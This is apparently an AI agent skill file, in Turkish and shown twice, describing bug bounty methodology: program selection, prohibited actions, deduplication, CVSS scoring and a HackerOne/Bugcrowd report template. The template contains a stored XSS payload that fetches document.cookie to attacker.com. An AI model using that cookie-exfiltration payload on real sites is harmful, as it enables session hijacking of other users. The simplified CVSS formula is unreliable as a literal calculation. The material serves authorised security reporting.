pentest-bugbounty
Bug bounty avlama disiplini — sadece yetkili programlar, ROE'ye sadakat, dedupe, kaliteli rapor.
Triggers
- "H1 raporu yazalim"
- "Bugcrowd submission"
- "CVSS skoru hesapla"
- "dedup nasil yapilir"
- "bounty rapor sablonu"
Program Secimi Kriterleri
| Faktor |
Etki |
| Scope genisligi (*.target.com vs sadece app) |
Saldiri yuzeyi |
| Bounty range (min-max) |
ROI |
| Response SLA (gun cinsinden) |
Sabir |
| Disclosure policy (public/private) |
Portfolio buyumesi |
| Safe Harbor (yasal koruma) |
Risk |
| Researcher rating gerekli mi (private prog) |
Erisilebilirlik |
Onerilen baslangic: VDP (vulnerability disclosure program) -> public bounty -> private invitation.
Ne YAPMAYIN (Program Ihlali)
- Scope disi varlik test (her zaman ban + yasal risk)
- Production data exfil > kanit eshiti
- Otomatik scan vendor onaylamadan
- DoS / load test
- Sosyal muhendislik calisanlara (cogunlukla yasak)
- Brute force (cogunlukla yasak)
- Public disclosure musteri onayindan once
Dedup Stratejisi
Submission'dan once:
# H1 hacktivity
curl 'https://hackerone.com/<program>/hacktivity' | jq '.results[] | select(.title | contains("<finding-keyword>"))'
# Bugcrowd public submissions
# Program sayfasinda search
Eger ayni zafiyet tipi + ayni endpoint -> duplicate riski, baska program dene.
CVSS 3.1 Hizli Hesap
Base = Impact + Exploitability
Impact (CIA):
C/I/A: None=0, Low=0.22, High=0.56
Exploitability:
AV: Network=0.85, Adjacent=0.62, Local=0.55, Physical=0.2
AC: Low=0.77, High=0.44
PR: None=0.85, Low=0.62, High=0.27
UI: None=0.85, Required=0.62
Web exploit ornegi:
- SQLi (authenticated, network, low complexity, low priv, no UI, high CIA)
- AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 8.8 (HIGH)
Rapor Sablonu (H1 / Bugcrowd ortak)
## Title
[CRITICAL] Stored XSS in admin panel allows session hijack of all admins
## Severity
CVSS 3.1: 9.0 (CRITICAL)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
## Summary
Authenticated low-priv user can inject JS into the comment field that
executes in admin browser when viewing dashboard. Session token is
exfiltrated to attacker-controlled domain.
## Steps to Reproduce
1. Login as low-privilege user (user@example.com / Test123!)
2. Navigate to /comments
3. Submit comment body: `<img src=x
4. As admin, navigate to /admin/comments
5. Observe outbound request to attacker.com containing admin session cookie
## Impact
- Full admin compromise (session hijack)
- Persistent payload (stored DB)
- 1-click via existing admin workflow (no extra interaction)
## Proof of Concept
[screenshot1.png] — comment submission
[screenshot2.png] — admin browser request
[burp-export.har] — full HAR file
## Suggested Fix
- Server-side sanitize comment body (DOMPurify on save, not on render)
- CSP: `default-src 'self'; img-src 'self' data:`
- Cookie: `HttpOnly` + `Secure` + `SameSite=Strict`
## Additional Context
- Affected version: 4.2.1 (production as of 2026-05-15)
- Tested on: Chrome 119, Firefox 120
- No public PoC, no CVE assigned
Triage Karsiti Hazirlik
Programa report'tan sonra triagecinin atip sorusabilecekleri:
| Soru |
Hazirlikli Olun |
| "Reproduce edemiyoruz" |
Video kayit ekle, browser/OS belirt |
| "User input limit yok zaten" |
Real impact (admin session) demonstrasyonu |
| "Bu duplicate, sok N sundu" |
Talep ettiginiz farkli endpoint / dedup linki |
| "Self-XSS sayariz" |
Multi-user etkisini kanit |
Bounty Maksimizasyon
- Chain bug: Low + Low + Med -> Critical chain (premium payout)
- Out-of-band: DNS, email, time-based POC (zor reproduce -> kalite puani)
- Detection bypass: WAF / CSP bypass kanit
- Multi-domain impact: Birden cok asset etkilenirse explicit ekle
Out-of-Scope
- Otomatik dedup tool composer'i (insan kararı)
- Sosyal muhendislik calisanlara
- Yasakli teknik kullanma (DoS, brute force)
1---2name: pentest-bugbounty3description: Bug bounty methodology — HackerOne/Bugcrowd/Intigriti, deduplication, rapor yazimi, severity scoring, payout maksimizasyonu advisory. Triggers on bug bounty, HackerOne, Bugcrowd, Intigriti, H1, BB, dedup, severity, CVSS scoring, bug report writing, triage.4license: MIT5---6
7# pentest-bugbounty
8
9Bug bounty avlama disiplini — sadece yetkili programlar, ROE'ye sadakat, dedupe, kaliteli rapor.
10
11## Triggers
12
13- "H1 raporu yazalim"
14- "Bugcrowd submission"
15- "CVSS skoru hesapla"
16- "dedup nasil yapilir"
17- "bounty rapor sablonu"
18
19## Program Secimi Kriterleri
20
21| Faktor | Etki |
22|--------|------|
23| Scope genisligi (*.target.com vs sadece app) | Saldiri yuzeyi |
24| Bounty range (min-max) | ROI |
25| Response SLA (gun cinsinden) | Sabir |
26| Disclosure policy (public/private) | Portfolio buyumesi |
27| Safe Harbor (yasal koruma) | Risk |
28| Researcher rating gerekli mi (private prog) | Erisilebilirlik |
29
30**Onerilen baslangic**: VDP (vulnerability disclosure program) -> public bounty -> private invitation.
31
32## Ne YAPMAYIN (Program Ihlali)
33
34- Scope disi varlik test (her zaman ban + yasal risk)
35- Production data exfil > kanit eshiti
36- Otomatik scan vendor onaylamadan
37- DoS / load test
38- Sosyal muhendislik calisanlara (cogunlukla yasak)
39- Brute force (cogunlukla yasak)
40- Public disclosure musteri onayindan once
41
42## Dedup Stratejisi
43
44Submission'dan once:
45
46```bash
47# H1 hacktivity
48curl 'https://hackerone.com/<program>/hacktivity' | jq '.results[] | select(.title | contains("<finding-keyword>"))'
49
50# Bugcrowd public submissions
51# Program sayfasinda search
52```
53
54Eger ayni zafiyet tipi + ayni endpoint -> **duplicate riski**, baska program dene.
55
56## CVSS 3.1 Hizli Hesap
57
58```
59Base = Impact + Exploitability
60
61Impact (CIA):
62 C/I/A: None=0, Low=0.22, High=0.56
63
64Exploitability:
65 AV: Network=0.85, Adjacent=0.62, Local=0.55, Physical=0.2
66 AC: Low=0.77, High=0.44
67 PR: None=0.85, Low=0.62, High=0.27
68 UI: None=0.85, Required=0.62
69```
70
71Web exploit ornegi:
72- SQLi (authenticated, network, low complexity, low priv, no UI, high CIA)
73 - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = **8.8 (HIGH)**
74
75## Rapor Sablonu (H1 / Bugcrowd ortak)
76
77```markdown
78## Title
79[CRITICAL] Stored XSS in admin panel allows session hijack of all admins
80
81## Severity
82CVSS 3.1: 9.0 (CRITICAL)
83Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
84
85## Summary
86Authenticated low-priv user can inject JS into the comment field that
87executes in admin browser when viewing dashboard. Session token is
88exfiltrated to attacker-controlled domain.
89
90## Steps to Reproduce
911. Login as low-privilege user (user@example.com / Test123!)
922. Navigate to /comments
933. Submit comment body: `<img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">`
944. As admin, navigate to /admin/comments
955. Observe outbound request to attacker.com containing admin session cookie
96
97## Impact
98- Full admin compromise (session hijack)
99- Persistent payload (stored DB)
100- 1-click via existing admin workflow (no extra interaction)
101
102## Proof of Concept
103[screenshot1.png] — comment submission
104[screenshot2.png] — admin browser request
105[burp-export.har] — full HAR file
106
107## Suggested Fix
108- Server-side sanitize comment body (DOMPurify on save, not on render)
109- CSP: `default-src 'self'; img-src 'self' data:`
110- Cookie: `HttpOnly` + `Secure` + `SameSite=Strict`
111
112## Additional Context
113- Affected version: 4.2.1 (production as of 2026-05-15)
114- Tested on: Chrome 119, Firefox 120
115- No public PoC, no CVE assigned
116```
117
118## Triage Karsiti Hazirlik
119
120Programa report'tan sonra triagecinin atip sorusabilecekleri:
121
122| Soru | Hazirlikli Olun |
123|------|-----------------|
124| "Reproduce edemiyoruz" | Video kayit ekle, browser/OS belirt |
125| "User input limit yok zaten" | Real impact (admin session) demonstrasyonu |
126| "Bu duplicate, sok N sundu" | Talep ettiginiz farkli endpoint / dedup linki |
127| "Self-XSS sayariz" | Multi-user etkisini kanit |
128
129## Bounty Maksimizasyon
130
131- **Chain bug**: Low + Low + Med -> Critical chain (premium payout)
132- **Out-of-band**: DNS, email, time-based POC (zor reproduce -> kalite puani)
133- **Detection bypass**: WAF / CSP bypass kanit
134- **Multi-domain impact**: Birden cok asset etkilenirse explicit ekle
135
136## Out-of-Scope
137
138- Otomatik dedup tool composer'i (insan kararı)
139- Sosyal muhendislik calisanlara
140- Yasakli teknik kullanma (DoS, brute force)